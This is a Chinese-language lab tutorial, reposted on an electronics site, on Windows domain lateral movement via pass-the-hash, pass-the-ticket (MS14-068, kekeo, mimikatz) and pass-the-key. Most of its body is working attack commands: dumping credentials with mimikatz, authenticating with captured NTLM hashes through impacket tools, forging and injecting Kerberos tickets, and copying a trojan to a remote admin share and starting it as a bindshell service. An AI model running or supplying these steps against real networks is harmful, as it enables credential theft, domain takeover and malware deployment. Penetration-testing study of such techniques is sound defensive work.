0
  • 聊天消息
  • 系統(tǒng)消息
  • 評論與回復(fù)
登錄后你可以
  • 下載海量資料
  • 學(xué)習(xí)在線課程
  • 觀看技術(shù)視頻
  • 寫文章/發(fā)帖/加入社區(qū)
會員中心
創(chuàng)作中心

完善資料讓更多小伙伴認(rèn)識你,還能領(lǐng)取20積分哦,立即完善>

3天內(nèi)不再提示

什么是PTH?PTH利用手法介紹

jf_vLt34KHi ? 來源:Tide安全團(tuán)隊 ? 2023-05-16 09:44 ? 次閱讀

PTH

什么是PTH?

pass the hash:哈希傳遞攻擊,簡稱PTH,是在內(nèi)網(wǎng)滲透中一種很經(jīng)典的攻擊方式,原理就是攻擊者可以直接通過LM Hash或NTLM Hash訪問遠(yuǎn)程主機或服務(wù),而不用提供明文密碼。在域環(huán)境中,用戶登錄計算機時使用的大部分都是域賬號,大量計算機在安裝時會使用相同的本地管理員賬戶密碼。因此,如果計算機的本地管理員賬號和密碼也是相同的,攻擊者就可以使用哈希傳遞的方法登錄到內(nèi)網(wǎng)主機的其他計算機。因此,此類攻擊適用于:

?域/工作組環(huán)境

?可以獲得hash,但是條件不允許對hash進(jìn)行爆破

?內(nèi)網(wǎng)中存在和當(dāng)前機器相同的密碼

另外需要注意在Windows server 2012 R2 之前使用到的密碼散列值是LM Hash、NTLM Hash,在2012 R2及其版本之后使用到的密碼散列值是NTLM Hash。

PTH利用手法

當(dāng)前演示環(huán)境如下:

92b64c2c-f329-11ed-90ce-dac502259ad0.png

如上圖,該內(nèi)網(wǎng)環(huán)境,域名為gog.org,共有3臺機器,其中攻擊者已經(jīng)拿下了與該環(huán)境的Webserver,并讀取到了該機器中的hash,接下來讓我們嘗試通過哈希傳遞的方式獲取內(nèi)網(wǎng)其他兩臺機器的控制權(quán)

mimikatz

其中我們的神器mimikatz就可以進(jìn)行PTH攻擊,但是mimikatz中的PTH攻擊會在當(dāng)前目標(biāo)機器桌面中彈一個cmd窗口,所以不適合CS使用,適合獲得當(dāng)前目標(biāo)桌面權(quán)限后再使用該命令去進(jìn)行橫向移動。首先我們先在Webserver中上傳mimikatz,并讀取hash:

privilege::debug#提升權(quán)限
sekurlsa::logonpasswords#抓取密碼
92d5665c-f329-11ed-90ce-dac502259ad0.png

獲得本地管理員用戶的Hash后,用mimikatz將administrator的hash添加到lsass進(jìn)程中

sekurlsa::pth/user:administrator/domain:192.168.3.32/ntlm:518b98ad4178a53695dc997aa02d455c
92f7ac58-f329-11ed-90ce-dac502259ad0.png

成功后會彈出一個新的cmd窗口,這時再去訪問遠(yuǎn)程主機服務(wù),就不需要提供明文密碼了,直接連接即可

9331d572-f329-11ed-90ce-dac502259ad0.png

這時我們將192.168.3.32上線到CS中,就可使用將木馬復(fù)制到該機器中,然后使用sc創(chuàng)建一個服務(wù)綁定木馬,然后啟動該服務(wù)上線即可,具體實現(xiàn)命令如下:

copy4444.exe\192.168.3.32c$#上傳木馬到目標(biāo)機器中
sc\192.168.3.32createbindshellbinpath="c:4444.exe"#創(chuàng)建shell服務(wù)并綁定文件
93747ef4-f329-11ed-90ce-dac502259ad0.png9396748c-f329-11ed-90ce-dac502259ad0.png

可以看到目標(biāo)機器中已經(jīng)創(chuàng)建了bindshell服務(wù),這里我們直接啟用該服務(wù)即可

sc\192.168.3.32startbindshell#啟動bindshell服務(wù)
93c01f1c-f329-11ed-90ce-dac502259ad0.png

啟動之后3.32成功上線。但是,在使用mimikatz進(jìn)行哈希傳遞攻擊時需要注意以下幾點:

1.使用mimikatz進(jìn)行哈希傳遞要具有本地管理員權(quán)限

2.dir命令后面盡量跟主機名,否則可能會報錯

impacket套件

除了mimikatz之外,像之前我們提到的impacket中的smbexec、wmiexec、psexec都可以進(jìn)行PTH攻擊。pythonpsexec.py-hashes:518b98ad4178a53695dc997aa02d455c./administrator@192.168.32"whoami"

93d1cf64-f329-11ed-90ce-dac502259ad0.png

pythonwmiexec.py-hashes:518b98ad4178a53695dc997aa02d455c./administrator@192.168.3.32"whoami"
93f090ac-f329-11ed-90ce-dac502259ad0.png
pythonsmbexec.py-hashes:518b98ad4178a53695dc997aa02d455c./administrator@192.168.3.32
940cdc8a-f329-11ed-90ce-dac502259ad0.png

PTT

pass the ticket:票據(jù)傳遞攻擊,簡稱PTT,利用的票據(jù)憑證TGT進(jìn)行的橫向移動,它是利用Kerberos協(xié)議進(jìn)行攻擊的,這里介紹三種常見的攻擊方法:MS14-068、Golden Ticket、SILVER ticket,簡單來說就是將連接合法的票據(jù)注入到內(nèi)存中實現(xiàn)連接。缺點:票據(jù)是有效期的,一般默認(rèn)為10小時。

MS14-068

MS14-068是密鑰分發(fā)中心(KDC)服務(wù)中的Windows漏洞,它允許經(jīng)過身份驗證的用戶在其Kerberos票據(jù)(TGT)中插入任意PAC。該漏洞位于kdcsvc.dll域控制器的密鑰分發(fā)中心(KDC)中,用戶可以通過呈現(xiàn)具有改變的PAC的Kerberos TGT來獲得票證。MS14-068所造成的危害是允許域內(nèi)任何一個普通用戶都可以將自己提升為域管權(quán)限。微軟給出的修復(fù)補丁是KB3011780,漏洞攻擊是否成功要看目標(biāo)機器打沒打KB3011780補丁。

漏洞利用

可以看到當(dāng)前我們所處的身份是域內(nèi)的一個普通用戶,是無法對域控進(jìn)行文件操作的。

94256cbe-f329-11ed-90ce-dac502259ad0.png

這里我們第一步先獲取當(dāng)前機器的SID

shellwhoami/user
9441e164-f329-11ed-90ce-dac502259ad0.png

拿到SID后,使用我們的ms14-068.exe生成一個票據(jù)文件。-u指定當(dāng)前用戶,-s 輸入我們剛剛獲取到的SID,-p輸入當(dāng)前用戶密碼,具體命令如下

shellms14-068.exe-uwebadmin@god.org-sS-1-5-21-1218902331-2157346161-1782232778-1132-d192.168.3.21-padmin!@#45
945891de-f329-11ed-90ce-dac502259ad0.png

執(zhí)行該命令后可以看到當(dāng)前目錄生成了一個票據(jù)文件。

947b0048-f329-11ed-90ce-dac502259ad0.png

這里生成票據(jù)文件后,就可以嘗試連接目標(biāo)看能否進(jìn)行操作 首先清除下票據(jù),以防該連接是以之前的票據(jù)進(jìn)行連接的

shellklistpurge
9491ff32-f329-11ed-90ce-dac502259ad0.png

票據(jù)為空后,這里我們直接開始使用mimikatz導(dǎo)入票據(jù),之后再來查看當(dāng)前電腦的票據(jù)信息,看其是否有產(chǎn)生新的票據(jù)

mimikatzkerberos::ptcTGT_webadmin@god.org.ccache
shellklist
94affdf2-f329-11ed-90ce-dac502259ad0.png

票據(jù)為空后,這里我們直接嘗試與目標(biāo)主機進(jìn)行連接創(chuàng)建服務(wù)進(jìn)行上線(這里建議在連接時,使用主機名進(jìn)行連接,IP地址容易產(chǎn)生失敗的問題)

shellnetuse\OWA2010CN-GODc$
shellcopy4444.exe\OWA2010CN-GODc$
shellsc\OWA2010CN-GODcreatebinshel1binpath="c:4444.exe"
shellsc\OWA2010-GODstartbinshel1
94dadf90-f329-11ed-90ce-dac502259ad0.png94fe30f8-f329-11ed-90ce-dac502259ad0.png

成功執(zhí)行上線到CS,相對來說,MS14-068這個漏洞利用條件較為簡單,如果域控沒有打KB3011780補丁,哪怕一個普通用戶權(quán)限也可以去嘗試該漏洞進(jìn)行利用。

kekeo

利用獲取到的NTLM生成新的票據(jù)去嘗試,成功與否看NTLM是否正確 缺點:票據(jù)是有效期的,所以如果當(dāng)前主機在鏈接過域控的話,有效期內(nèi)可利用。kekeo和下面的mimikatz與剛剛我們上面的ms14-068原理不太一樣,ms14-068是基于漏洞,去允許域內(nèi)任何一個普通用戶將自己提升為域管權(quán)限,而kekeo和mimikatz是基于hash生成票據(jù),然后再進(jìn)行連接。這里假設(shè)我們已經(jīng)通過橫向其他機器,拿到了域控的hash,然后通過kekeo來偽造票據(jù)進(jìn)行連接。

95102772-f329-11ed-90ce-dac502259ad0.png

首先來看我們現(xiàn)在跳板機中的票據(jù)是空的

shellklist
952dd736-f329-11ed-90ce-dac502259ad0.png

然后上傳我們的kekeo文件,首先先生成票據(jù)

shellkekeo"tgt::ask/user:Administrator/domain:god.org/ntlm:ccef208c6485269c20db2cad21734fe7""exit"
9545e7a4-f329-11ed-90ce-dac502259ad0.png

生成好后,可以看到當(dāng)前目錄會生成一個文件

955c3446-f329-11ed-90ce-dac502259ad0.png

該文件就是我們剛剛所生成的票據(jù)文件,接下來我們將它導(dǎo)入到內(nèi)存中后,再來看我們的當(dāng)前跳板機中有沒有新增票據(jù)

shellkekeo"kerberos::pttTGT_Administrator@GOD.ORG_krbtgt~god.org@GOD.ORG.kirbi""exit"
shellklist
95784f32-f329-11ed-90ce-dac502259ad0.png

可以看到成功導(dǎo)入了一個票據(jù),那這里我們對域控進(jìn)行嘗試連接

shelldir\owa2010cn-godc$
95ad298c-f329-11ed-90ce-dac502259ad0.png

成功連接,那現(xiàn)在我相信大家可能都有一個疑問,就是現(xiàn)在都有了hash了,我直接使用pth去橫向他不是更方便嗎,為什么還要多此一舉去生成票據(jù)之后,再用票據(jù)去進(jìn)行橫向呢?當(dāng)然也是可以的,但是因為pth他所基于的協(xié)議,如smb、wmi、icp等,他們都依賴于135、445、139等端口等,那如果在環(huán)境中,出現(xiàn)端口、協(xié)議被禁用的情況的話,可以嘗試使用得到的hash生成票據(jù)來進(jìn)行橫向。

MIMIKATZ

因為當(dāng)前主機肯定之前與其他主機連接過,所以本地應(yīng)該生成了一些票據(jù),我們可以導(dǎo)出這些票據(jù),然后在導(dǎo)入票據(jù),利用,該方法類似于cookie欺騙。去利用歷史遺留的票據(jù)重新認(rèn)證嘗試,成功與否看當(dāng)前主機有沒有被目標(biāo)主機連接過。缺點:需要高權(quán)限用戶 在進(jìn)行本實驗之前,需要先模擬一下域管用戶在本機上的連接操作,留下票據(jù)之后在進(jìn)行橫向操作(可以在域控中遠(yuǎn)程鏈接一下跳板機或向C盤寫入一個文件并認(rèn)證)。

95cb5542-f329-11ed-90ce-dac502259ad0.png

如上圖,我們假設(shè)這條票據(jù)是之前域管用戶在跳板機中留下的歷史票據(jù),那這里我們可以使用mimikatz進(jìn)行偽造票據(jù)。首先我們先將內(nèi)存中的票據(jù)導(dǎo)出

mimikatzsekurlsa::tickets/export

導(dǎo)出后可以看到當(dāng)前目錄會出現(xiàn)一個票據(jù)文件

95ee5a06-f329-11ed-90ce-dac502259ad0.png

這里再將其導(dǎo)入到內(nèi)存中

mimikatzkerberos::pttC:UserswebadminDesktopTGT_Administrator@GOD.ORG_krbtgt~god.org@GOD.ORG.kirbi
96070f06-f329-11ed-90ce-dac502259ad0.png

導(dǎo)入成功后,這里我們直接進(jìn)行對靶標(biāo)進(jìn)行連接

shellnetuse\owa2010cn-godc$
shelldir\OWA2010CN-GODc$
961b50a6-f329-11ed-90ce-dac502259ad0.png

PTK

pass the key:密鑰傳遞攻擊,簡稱PTK,利用的ekeys aes256進(jìn)行的橫向移動,成功幾率不是很高,利用條件苛刻 漏洞利用條件:當(dāng)系統(tǒng)安裝了KB2871997補丁且禁用了NTLM的時候,那我們抓取到的NTLM hash就失去了作用,但是可以通過PTK的攻擊方式獲得權(quán)限。首先使用mimikatz導(dǎo)出aes值

mimikatzsekurlsa::ekeys
963b56f8-f329-11ed-90ce-dac502259ad0.png

導(dǎo)出后使用我們下面這條命令來進(jìn)行利用

mimikatzsekurlsa::pth/user:域用戶名/domain:域名/aes256:aes256值
mimikatzsekurlsa::pth/user:administrator/domain:god/aes256:1811e5811877a782b6c11e2b0165ffb88d40a633f922a012372095a43d72d7ae

執(zhí)行后會在桌面彈出一個cmd窗口,這里就可以進(jìn)行橫向移動利用,但是上文也講了,該移動方法的利用條件有點苛刻,他是目標(biāo)系統(tǒng)必須打了KB2871997且禁用了NTLM hash傳遞時,才可以利用,但是由于我們的靶場環(huán)境并沒有打KB2871997補丁且沒有禁用NTLM Hash,故無法利用成功。且當(dāng)一個思路吧。





審核編輯:劉清

聲明:本文內(nèi)容及配圖由入駐作者撰寫或者入駐合作網(wǎng)站授權(quán)轉(zhuǎn)載。文章觀點僅代表作者本人,不代表電子發(fā)燒友網(wǎng)立場。文章及其配圖僅供工程師學(xué)習(xí)之用,如有內(nèi)容侵權(quán)或者其他違規(guī)問題,請聯(lián)系本站處理。 舉報投訴
  • PTH
    PTH
    +關(guān)注

    關(guān)注

    0

    文章

    40

    瀏覽量

    17698
  • Hash算法
    +關(guān)注

    關(guān)注

    0

    文章

    43

    瀏覽量

    7378

原文標(biāo)題:橫向移動之PTH、PPT、PTK

文章出處:【微信號:Tide安全團(tuán)隊,微信公眾號:Tide安全團(tuán)隊】歡迎添加關(guān)注!文章轉(zhuǎn)載請注明出處。

收藏 人收藏

    評論

    相關(guān)推薦

    PTH和NPTH的簡單區(qū)別

      PTH是沉銅孔(Plating Through Hole),孔壁有銅,一般是過電孔(VIA)及元件孔?! PTH是非沉銅孔(Non Plating Through Hole),孔壁無銅,一般是定位孔及鑼絲孔。可用干膜封孔或在電鍍前膠粒塞或電鍍后二次鉆孔或啤出。
    發(fā)表于 08-29 09:55

    PTH12020 pdf datasheet

    The PTH12020 series of non-isolatedpower modules offers OEM designers acombination of high
    發(fā)表于 08-06 16:58 ?32次下載

    PTH12060 pdf datasheet

    The PTH12060 series is a non-isolated power module, and part of a new class of complete dc/dc
    發(fā)表于 08-06 16:59 ?14次下載

    PTH05060W pdf datasheet

    The PTH05060W non-isolated powermodule is small in size but big on performanceand flexibility. Its
    發(fā)表于 08-06 17:03 ?17次下載

    PTH08T221W,pdf(16-A, 4.5-V to

    The PTH08T220/221W is a high-performance 16-A rated, non-isolated power module. These modules
    發(fā)表于 11-16 14:43 ?6次下載

    PTH04T240W,PTH04T241W,pdf(10-A

    The PTH04T240/241W is a high-performance 10-A rated, non-isolated power module. These modules
    發(fā)表于 11-16 15:12 ?9次下載

    PTH04T230W,PTH04T231W,pdf(6-A,

    The PTH04T230/231W is a high-performance, 6-A rated, non-isolated power module. This regulator
    發(fā)表于 11-16 15:17 ?9次下載

    PTH08T230W,PTH08T231W,pdf(6-A

    The PTH08T230/231W is the higher input voltage (4.5V to 14V) version of the PTH04T230/231W (2.2V
    發(fā)表于 11-16 15:24 ?10次下載

    PTH08T240W,PTH08T241W,pdf(10A

    The PTH08T240/241W is a high-performance 10-A rated, non-isolated power module. These modules
    發(fā)表于 11-16 15:26 ?17次下載

    PTH04T221W,pdf(16-A, 2.2-V to

    The PTH04T220/221W is the lower input voltage (2.2V to 5.5V) version of the PTH08T220/221W (4.5V
    發(fā)表于 11-16 16:12 ?5次下載

    PTH08000W,pdf(2.25 A 4.5-V TO

    The PTH08000W is a highly integrated, low-cost switching regulator module that delivers up to 2.25
    發(fā)表于 11-18 12:14 ?9次下載

    PTH12030W,PTH12030L,pdf(26 A,

    The PTH12030 is a series of high current, non-isolated power module from Texas Instruments.
    發(fā)表于 11-18 13:45 ?6次下載

    PTH12060W,PTH12060L,pdf(10 A,

    The PTH12060 series is a non-isolatedpower module, and part of a new class of complete dc/dc
    發(fā)表于 11-18 13:51 ?11次下載

    PTH與NPTH的區(qū)別及用途

    PCB板設(shè)計中,孔有四個作用:電氣導(dǎo)通、定位、散熱、方便分板。而孔又分導(dǎo)通孔(PTH)和非導(dǎo)通孔(NPTH),而在一般的設(shè)計中,只有PTH孔有孔環(huán)(見下圖),NPTH孔是不具備有孔環(huán)的,但是一些特殊情況也會將NPTH孔設(shè)計孔環(huán)(這時候的孔環(huán)起到接地作用)。
    的頭像 發(fā)表于 05-23 14:53 ?6.9w次閱讀

    了解pcb制造中的PTH工藝

    化學(xué)鍍銅,我們也稱為鍍通孔(PTH),它是一種自催化氧化還原反應(yīng)。 PTH工藝在鉆完兩層或更多層后進(jìn)行。
    的頭像 發(fā)表于 07-29 09:49 ?2.8w次閱讀
    了解pcb制造中的<b class='flag-5'>PTH</b>工藝